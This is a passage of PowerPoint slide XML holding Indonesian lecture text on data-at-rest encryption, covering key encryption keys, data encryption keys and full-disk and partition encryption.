            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (KEK).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES512. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (DEK). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data target. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KEK. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27204186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Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Disk dan File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipikirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tingkat yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesederhanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Tingkat yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikombinasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> granular.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Partisi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (FDE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>isi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area metadata yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
